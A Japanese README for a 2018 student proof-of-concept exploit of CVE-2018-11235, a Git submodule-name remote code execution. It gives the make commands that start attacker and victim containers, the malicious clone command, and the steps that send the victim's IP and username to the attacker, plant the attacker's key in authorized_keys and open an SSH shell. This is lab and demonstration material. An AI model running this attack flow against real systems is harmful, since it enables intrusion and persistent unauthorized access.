
概念実証 - RCEエクスプロイト : Gitサブモジュール名の脆弱性 - Ensimag 2018年11月
Docker コンテナをビルドするには、次を使用します:
make docker
(以下の make コマンドは、お使いのマシンの異なるターミナルで並行して実行してください)
攻撃者サーバーのコンテナを起動するには、次を使用します:
make run_server
被害者を表すコンテナを起動するには、次を使用します:
make run_client
コンテナは client.py スクリプトを起動します。このスクリプトは、自身の IP アドレスとユーザー名を攻撃者に送信します。
クライアントのコンソールの指示に従って、悪意のある git リポジトリをクローンしてください。
git clone --recurse-submodules root@server:home/poc/malicious_repo client_pwned
被害者の IP アドレスとユーザー名がサーバーに送信されることが確認できます。
クローン後、攻撃者の公開鍵がクライアントの authorized_keys に正しく追加されていることを確認してください。
次に、サーバーからクライアントへのシェルを開くには、お使いのマシンで次のコマンドを実行します:
make server_bash
ssh <transmitted_username>@<transmitted_host>
この Proof of Concept の実行に関して何か問題が発生した場合は、このリポジトリに issue を作成してください:https://github.com/ygouzerh/CVE-2018-11235/issues 。できるだけ早く回答いたします。